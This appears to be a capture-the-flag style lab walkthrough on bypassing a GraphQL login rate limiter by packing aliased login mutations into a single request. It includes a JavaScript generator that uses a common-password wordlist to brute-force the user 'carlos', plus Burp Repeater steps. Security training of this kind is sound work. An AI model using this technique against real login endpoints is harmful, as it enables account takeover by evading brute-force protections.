Lab: Bypassing GraphQL brute force protections

The user login mechanism for this lab is powered by a GraphQL API. The API endpoint has a rate limiter that returns an error if it receives too many requests from the same origin in a short space of time.

To solve the lab, brute force the login mechanism to sign in as carlos. Use the list of authentication lab passwords as your password source.

This lab requires you to craft a large request that uses aliases to send multiple login attempts at the same time. As this request could be time-consuming to create manually, we recommend you use a script to build the request.

The below example JavaScript builds a list of aliases corresponding to our list of authentication lab passwords and copies the request to your clipboard. To run this script:

  1. Open the lab in Burp's browser.

  2. Right-click the page and select Inspect.

  3. Select the Console tab.

  4. Paste the script and press Enter.

You can then use the generated aliases when crafting your request in Repeater.


copy(`123456,password,12345678,qwerty,123456789,12345,1234,111111,1234567,dragon,123123,baseball,abc123,football,monkey,letmein,shadow,master,666666,qwertyuiop,123321,mustang,1234567890,michael,654321,superman,1qaz2wsx,7777777,121212,000000,qazwsx,123qwe,killer,trustno1,jordan,jennifer,zxcvbnm,asdfgh,hunter,buster,soccer,harley,batman,andrew,tigger,sunshine,iloveyou,2000,charlie,robert,thomas,hockey,ranger,daniel,starwars,klaster,112233,george,computer,michelle,jessica,pepper,1111,zxcvbn,555555,11111111,131313,freedom,777777,pass,maggie,159753,aaaaaa,ginger,princess,joshua,cheese,amanda,summer,love,ashley,nicole,chelsea,biteme,matthew,access,yankees,987654321,dallas,austin,thunder,taylor,matrix,mobilemail,mom,monitor,monitoring,montana,moon,moscow`.split(',').map((element,index)=>`
bruteforce$index:login(input:{password: "$password", username: "carlos"}) {
        token
        success
    }
`.replaceAll('$index',index).replaceAll('$password',element)).join('\n'));console.log("The query has been copied to your clipboard.");

Steps

  • Open Burp Suite and visit the target website

  • Send the POST /graphql/v1 Login request to the repeater

  • In the browser window copy the javascript code that is given in the hint section and execute

  • Go to the Repeater tab and paste the copied payload inside mutation section

  • Send the request

  • In the response tab search for the value true in the bottom search bar

  • We can see the brute force index which we can now see the bruteforce index in the request tab to view the password of Carlos

  • Login using Carlos user to solve the lab.

PreviousBypassing rate limiting using aliasesNextGraphQL CSRF

Last updated